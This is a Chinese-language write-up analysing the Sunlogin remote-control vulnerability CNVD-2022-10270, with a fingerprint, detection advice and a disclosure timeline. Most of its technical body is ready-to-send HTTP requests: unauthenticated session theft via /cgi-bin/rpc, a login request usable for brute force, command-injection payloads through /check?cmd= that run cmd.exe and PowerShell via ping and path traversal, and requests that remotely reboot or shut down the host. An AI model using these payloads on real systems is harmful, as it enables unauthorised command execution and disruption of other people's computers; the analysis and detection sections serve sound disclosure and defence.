向日葵远程命令执行漏洞分析

0x00 相关报道

• CNVD： https://www.cnvd.org.cn/flaw/show/CNVD-2022-10270
• 向日葵团队： https://www.oray.com/announcements/affiche/?aid=774

0x01 程序详情

测试程序版本为11.0.0.33162，官网目前只开放12.5版本，但是可以遍历下载ID进行下载


向日葵为C++编写，使用UPX3.X加壳故此分析前需要进行脱壳处理（github上有UPX项目，可以直接脱）


此外向日葵在启动的时候会随机启动一个4W+高位端口并记录在日志中，具体在sub_140E0AAE8可看到

0x02 根据日志找session

社会孙在视频中有一段疑似session的字符串

根据这段疑似session的关键字在向日葵一次正常远程的日志中找到了关键字CID

随后载入IDA，对CID关键字进行搜索

找到3个函数存在CID关键字字符串
sub_140E20938、sub_140E1C954、sub_140E1A1F4
往上跟发现分别对应接口
/cgi-bin/rpc和/cgi-bin/login.cgi

其中在函数sub_140E1C954对应接口功能/cgi-bin/rpc中，传入如下参数即可在未授权的情况下获取到有效session

POST /cgi-bin/rpc HTTP/1.1
Host: 10.100.100.5:49670
Proxy-Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: SLRC/11.0.0.33162 (Windows,x64)Chrome/98.0.4758.82 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/x-www-form-urlencoded
Content-Length: 62

action=verify-haras

在知道被控端的验证码和识别码的情况下传入如下参数可获取到session

在知道主机的帐密的情况下通过/cgi-bin/login.cgi 接口传入如下参数可获取到session并返回设备的公网、内网地址等信息，该接口同时可用作暴力破解

POST /cgi-bin/login.cgi HTTP/1.1
Host: 10.100.100.5:49670
Proxy-Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/x-www-form-urlencoded
Content-Length: 52


act=login&username=admin&password=admin&hostname=a

0x03 RCE-trick

assist参数拼接导致



我这边没有成功，有思路的师傅可以交流下

POST /assist HTTP/1.1
Host: 10.100.100.5:49496
Proxy-Connection: close
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Cookie: CID=dmPqDgSa8jOYgp1Iu1U7l1HbRTVJwZL3
connection: close
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/x-www-form-urlencoded
Content-Length: 110

fastcode=888888+||+"aaa"+%26%26+||+c:\windows\system32\cmd.exe+/c+whoami+>+C:\\Users\\__SUNLOGIN_USER__\\1.txt

0x04 RCE1

ping命令拼接导致

GET /check?cmd=ping%20127.0.0.1%20|%20cmd%20/c%20echo%20whoami%00 HTTP/1.1
Host: 10.100.100.5:49496
Proxy-Connection: close
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Cookie: CID=dmPqDgSa8jOYgp1Iu1U7l1HbRTVJwZL3
connection: close
Accept-Language: zh-CN,zh;q=0.9

GET /check?cmd=ping../../../windows/system32/windowspowershell/v1.0/powershell.exe+net+user HTTP/1.1
Host: 10.100.100.5:49496
Proxy-Connection: close
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Cookie: CID=dmPqDgSa8jOYgp1Iu1U7l1HbRTVJwZL3
connection: close
Accept-Language: zh-CN,zh;q=0.9

GET /check?cmd=ping../../../SysWOW64/cmd.exe+/c+net+user HTTP/1.1
Host: 10.100.100.5:49496
Proxy-Connection: close
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Cookie: CID=dmPqDgSa8jOYgp1Iu1U7l1HbRTVJwZL3
connection: close
Accept-Language: zh-CN,zh;q=0.9

0x05 远程重启

GET /control.cgi?__mode=control&act=reboot HTTP/1.1
Host: 10.100.100.5:49934
Proxy-Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Cookie: CID=lzKrTiUH5Z7GagluSTocMmHBAF9Pxz75
Accept-Language: zh-CN,zh;q=0.9

0x06 远程关机

GET /control.cgi?__mode=control&act=shutdown HTTP/1.1
Host: 10.100.100.5:49934
Proxy-Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Cookie: CID=lzKrTiUH5Z7GagluSTocMmHBAF9Pxz75
Accept-Language: zh-CN,zh;q=0.9

0x07指纹信息

低版本向日葵特征 body="Verification failure" && body="false" && header="Cache-Control: no-cache" && header="Content-Length: 46" && header="Content-Type: application/json"

0x08检测手段

主机层

主机层可通过检测向日葵连接日志中是否存在ping、../等关键字进行检查是否被入侵

帐号暴力破解可通过检查事件查看器中的类似日志进行排查

网络层

1. 检查高位端口流量中是否存在向日葵指纹特征
2. 检查流量中是否存在类似ping../、nslookup../关键字

后记

向日葵还有很多接口有兴趣的师傅可以继续跟进看看，我先卸载了。。

login
express_login
cgi-bin/login.cgi
log
cgi-bin/rpc
transfer
cloudconfig
getfastcode
assist
projection
getaddress
sunlogin-tools
control
desktop.list
check
micro-live/enable
screenshots
httpfile

Timeline

• 2022-2-14 监测到国内安全团队发布向日葵远程命令执行演示视频
• 2022-2-15 CNVD发布漏洞通告（CNVD-2022-10270）
• 2022-2-16 国内安全公司发布检测POC
• 2022-2-16 分析报告发布